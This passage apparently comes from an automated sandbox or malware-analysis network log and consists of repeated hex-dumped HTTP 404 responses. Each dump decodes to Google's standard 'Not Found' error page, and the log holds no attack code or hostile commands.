74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:24 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:32 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 